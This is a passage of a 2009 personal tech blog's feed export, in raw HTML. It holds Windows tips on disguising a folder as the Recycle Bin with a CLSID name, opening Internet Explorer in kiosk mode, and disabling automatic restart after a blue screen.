/&gt;&lt;/a&gt;&lt;br /&gt;Have you ever tried to hide folders containing ur private documents or having in appropriate contents from other people using ur PC…  in all probability each n everyone of you hav atleast tried it once .Now what do most ppl do ?&lt;br /&gt;&lt;br /&gt;Just make the folder hidden…but  guess you cant be sure that no one will be able to access it .My bro who is in 6th standard nos wat to do in order to view hidden folders&lt;br /&gt;The second option is installing a software like folder lock ..but then most of these software comes with a 30 day trail ..n u will hav to store all the contents in one particular folder specified by the software  you cant just hide any folder of ur choice..and the presence of the software itself means that there is something that you want to hide …any case it will make the other users all the more suspicious about wat u want to hide …so wats the soln?&lt;br /&gt;Here is a cool trick which I accidently found while I was trying to rename my Recycle Bin using registry editor ..the trick goes here&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} h3 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	mso-outline-level:3; 	font-size:13.5pt; 	font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;h3 style="text-align: center;" align="center"&gt;Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}&lt;br /&gt;e.g.,&lt;br /&gt;if you've a folder movies&lt;br /&gt;press F2,&lt;br /&gt;then type, "movies.{645FF040-5081-101B-9F08-00AA002F954E}"&lt;br /&gt;c the Result!!&lt;/h3&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} h3 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	mso-outline-level:3; 	font-size:13.5pt; 	font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;h3&gt;Instead of the folder youll see &lt;span style=""&gt; &lt;/span&gt;the recycle bin option ..and whoever clicks there is directed to recycle bin &lt;/h3&gt;  &lt;h3&gt;&lt;br /&gt;then 2 get to original form,&lt;br /&gt;just rename the folder to anything else and remove the key…. &lt;/h3&gt;  &lt;h3 style="font-weight: normal;"&gt;Now let me tell you wat is happening ..as I told u I was trying to rename my Recycle Bin to “Arka’s dustbin” I tried to modify this key {645FF040-5081-101B-9F08-00AA002F954E..this is the recycle bin key ..after that I just copied the key to the folder name and whew ..even I was surprised by the result …..&lt;/h3&gt;  &lt;h3 style="font-weight: normal;"&gt;If u hav some more kool stuff like this plz don’t forget to add comments&lt;/h3&gt;&lt;span style="font-weight: bold;"&gt;2moro ill try the same thing with 'My computer' ,'Control panel' registrty keys .lets c Wat happens whether the same logic works out for them also &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;**i hav received around 4-5 mails telling me that they havent been able to get their folders to the original state after being renamed into 'Recycle Bin' by the above method&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;here is a soln&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style="color: rgb(255, 255, 255);"&gt;go to command prompt and rename the folder there. Eg:- If the folder is in C:\Temp\ABC, then get to C:\Temp in the command prompt and type:&lt;br /&gt;REN ABC.&lt;/b&gt;&lt;span style="font-weight: bold; color: rgb(255, 255, 255);"&gt;{645FF040-5081-101B-9F08-00AA002F954E}&lt;/span&gt;&lt;b style="color: rgb(255, 255, 255);"&gt; ABC&lt;br /&gt;(Command Prompt supports CLIPBOARD. Copy-Paste will work there.)&lt;br /&gt;Your folder will be back to normal state.&lt;br /&gt;&lt;br /&gt;Note that this does not provide a reliable security to the data. It can be used just to prevent data from other novice users accessing your PC.&lt;br /&gt;&lt;br /&gt;Many fake-folder softwares work by this method. You can also search the registry for more relevant keys like these.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-style: italic;"&gt;**this method can be easily be cracked by any one having even an intermediate knowledge also there is no guarantee that data will remain as it is ..so don try it unless necessary&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style="text-align: center; font-weight: normal;" align="center"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/h3&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-7724391482205285754?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/7724391482205285754/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/disguise-folders-as-recycle-bin.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7724391482205285754'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7724391482205285754'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/disguise-folders-as-recycle-bin.html' title='DISGUISE FOLDERS AS RECYCLE BIN'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SeHLKlnOH4I/AAAAAAAAAGc/LvQzkix6ZIY/s72-c/recyclebin.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-9209070392538462179</id><published>2009-04-11T06:35:00.000-07:00</published><updated>2009-04-11T06:44:23.332-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOWNLOADS'/><title type='text'>USING INTERNET EXPLORER IN KIOSK MODE</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:12;"  &gt;A friend wanted Internet Explorer to open in Kiosk mode. In this view, there is nothing at the top, and nothing at the bottom. No toolbars, no taskbar. Nothing.&lt;br /&gt;&lt;br /&gt;Well, you can set that up automatically. You can use the current icon, or create a new one. I recommend the latter, so you're not locked into Kiosk mode.&lt;br /&gt;&lt;br /&gt;Start by right-clicking an empty area on the desktop. Select New&gt;&gt;Shortcut. In the box, enter "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -k. Name it IE Kiosk.&lt;br /&gt;&lt;br /&gt;Of course, there are no navigation buttons. So you have to substitute keystrokes. For instance, there is no Back button. But you can use the Backspace key. There's no Forward button, either. So you use Alt+Right Arrow. And to close the window? Click Ctrl+W.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/SeCeLvEa-MI/AAAAAAAAAF4/u_OSJAibOtg/s1600-h/ie-kiosk.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 244px;" src="http://3.bp.blogspot.com/_T53992hHLOM/SeCeLvEa-MI/AAAAAAAAAF4/u_OSJAibOtg/s400/ie-kiosk.JPG" alt="" id="BLOGGER_PHOTO_ID_5323428684002687170" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;font-size:12;"  &gt;&lt;br /&gt;     &lt;br /&gt;        &lt;span style="font-weight: bold; font-style: italic;"&gt;IE IN KIOSK MODE&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:12;"  &gt;Click here for Microsoft's list of keyboard shortcuts&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:&amp;quot;;font-size:12;"  &gt;&lt;a href="http://www.microsoft.com/enable/products/keyboard.aspx" target="_blank"&gt;http://www.microsoft.com/enable/products/keyboard.aspx&lt;/a&gt;  &lt;!--[if !supportLineBreakNewLine]--&gt;  &lt;!--[endif]--&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-9209070392538462179?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/9209070392538462179/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/using-internet-explorer-in-kiosk-mode.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/9209070392538462179'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/9209070392538462179'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/using-internet-explorer-in-kiosk-mode.html' title='USING INTERNET EXPLORER IN KIOSK MODE'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_T53992hHLOM/SeCeLvEa-MI/AAAAAAAAAF4/u_OSJAibOtg/s72-c/ie-kiosk.JPG' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-8705471416965309018</id><published>2009-04-10T08:09:00.000-07:00</published><updated>2009-04-10T08:16:40.494-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>BSOD</title><content type='html'>&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} h3 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	mso-outline-level:3; 	font-size:13.5pt; 	font-family:"Times New Roman"; 	font-weight:bold;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:744376922; 	mso-list-template-ids:1519039314;} @list l1 	{mso-list-id:2027124670; 	mso-list-template-ids:-1537860654;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;Abbreviated as &lt;span style="font-style: italic; font-weight: bold;"&gt;BSOD or BSoD,&lt;/span&gt; the blue screen of death is the popularized name for what is technically called a STOP message or STOP error. It's the blue, full screen error that often displays after a serious system crash. &lt;/p&gt;  &lt;p&gt;The text on the blue screen of death lists the files involved in the crash including any drivers that may have been at fault and a short, usually cryptic, description of what to do about the problem. &lt;/p&gt;  &lt;p&gt;Most importantly, the BSOD includes a STOP code that can be used to troubleshoot this specific STOP error. &lt;/p&gt;  &lt;p&gt;&lt;b&gt;Important:&lt;/b&gt; By default, most Windows installations are programmed to automatically restart after a BSOD which makes reading the STOP error code impossible. Before you can do any troubleshooting you'll need to to prevent this automatic restart:&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/Sd9h2X4LQ7I/AAAAAAAAAFg/ap9vs-PPSUc/s1600-h/BSOD_2.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 270px;" src="http://2.bp.blogspot.com/_T53992hHLOM/Sd9h2X4LQ7I/AAAAAAAAAFg/ap9vs-PPSUc/s400/BSOD_2.gif" alt="" id="BLOGGER_PHOTO_ID_5323080871325680562" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;Windows XP is programmed by default to restart immediately after a major error, like one that causes a Blue Screen of Death (BSOD). This reboot happens too fast to record the error message for use in troubleshooting. &lt;/p&gt;  &lt;p&gt;Follow these easy steps to disable the automatic restart feature for system failures in Windows XP. &lt;/p&gt;  &lt;h3&gt;Here's How:&lt;/h3&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;1.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Navigate to the &lt;i&gt;Control Panel&lt;/i&gt; in Windows XP by left-clicking on &lt;b&gt;Start&lt;/b&gt;, followed by &lt;b&gt;Settings&lt;/b&gt; and then choosing &lt;b&gt;Control Panel&lt;/b&gt;. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;2.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;In the &lt;i&gt;Control Panel&lt;/i&gt; window, open &lt;b&gt;System&lt;/b&gt;. &lt;/p&gt;  &lt;p style="margin-left: 0.5in;"&gt;&lt;b&gt;Note:&lt;/b&gt; In Microsoft Windows XP, depending on how your operating system is setup, you may not see the &lt;i&gt;System&lt;/i&gt; icon. To correct this, click on the link on the left-hand side of the &lt;i&gt;Control Panel&lt;/i&gt; window that says &lt;b&gt;Switch to Classic View&lt;/b&gt;. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;3.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;In the &lt;i&gt;System Properties&lt;/i&gt; window, click on the &lt;b&gt;Advanced&lt;/b&gt; tab. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;4.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Locate the &lt;i&gt;Startup and Recovery&lt;/i&gt; area and click on the &lt;b&gt;Settings&lt;/b&gt; button. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;5.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;In the &lt;i&gt;Startup and Recovery&lt;/i&gt; window, locate and &lt;b&gt;uncheck&lt;/b&gt; the check box next to &lt;i&gt;Automatically restart&lt;/i&gt;. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;6.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Click &lt;b&gt;OK&lt;/b&gt; in the &lt;i&gt;Startup and Recovery&lt;/i&gt; window. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;7.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Click &lt;b&gt;OK&lt;/b&gt; in the &lt;i&gt;System Properties&lt;/i&gt; window. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;8.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;From now on, when a problem causes a BSOD or another major error that halts the system, the PC will not automatically reboot. Rebooting manually will be necessary. &lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;For Windows Vista follow this procedure&lt;/p&gt;  &lt;h3&gt;Here's How:&lt;/h3&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;1.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Click on &lt;b&gt;Start&lt;/b&gt; and then &lt;b&gt;Control Panel&lt;/b&gt;. &lt;/p&gt;  &lt;p style="margin-left: 0.5in;"&gt;&lt;b&gt;Tip:&lt;/b&gt; In a hurry? Type &lt;b&gt;system&lt;/b&gt; in the search box after clicking &lt;b&gt;Start&lt;/b&gt;. Choose &lt;b&gt;System&lt;/b&gt; from the list of results and then skip to Step 4. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;2.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Click on the &lt;b&gt;System and Maintenance&lt;/b&gt; link. &lt;/p&gt;  &lt;p style="margin-left: 0.5in;"&gt;&lt;b&gt;Note:&lt;/b&gt; If you're viewing the &lt;i&gt;Classic View&lt;/i&gt; of Control Panel, you won't see this link. Simply double-click on the &lt;b&gt;System&lt;/b&gt; icon and proceed to Step 4. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;3.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Click on the &lt;b&gt;System&lt;/b&gt; link. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;4.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;In the task pane on the left, click the &lt;b&gt;Advanced system settings&lt;/b&gt; link. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;5.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Locate the &lt;i&gt;Startup and Recovery&lt;/i&gt; area and 